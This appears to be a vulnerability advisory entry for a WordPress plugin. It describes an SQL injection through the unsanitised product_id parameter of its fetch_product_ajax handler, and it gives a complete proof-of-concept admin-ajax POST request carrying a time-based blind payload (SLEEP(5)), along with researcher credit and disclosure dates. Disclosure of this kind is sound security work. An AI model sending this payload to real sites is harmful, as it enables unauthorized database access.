The fetch_product_ajax functionality in the plugin uses a `product_id` POST parameter which is not properly sanitised, escaped or validated before inserting to a SQL statement, leading to SQL injection.
POST /wp-admin/admin-ajax.php HTTP/1.1 Content-Length: 162 Accept: */* X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Sec-GPC: 1 Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: [admin+] Connection: close keyword=eewr&searchfilters=sku&security=c3b54163aa&action=cpf_cart_product&feedpath=core%2Fajax%2Fwp%2Ffetch_product_ajax.php&q=savep&local_cat_ids=1&product_id=1%20AND%20(SELECT%207403%20FROM%20(SELECT(SLEEP(5)))gJUc)
Syed Sheeraz Ali of Codevigilant
Yes
2021-08-22 (about 1 years ago)
2021-08-23 (about 1 years ago)
2022-04-09 (about 1 years ago)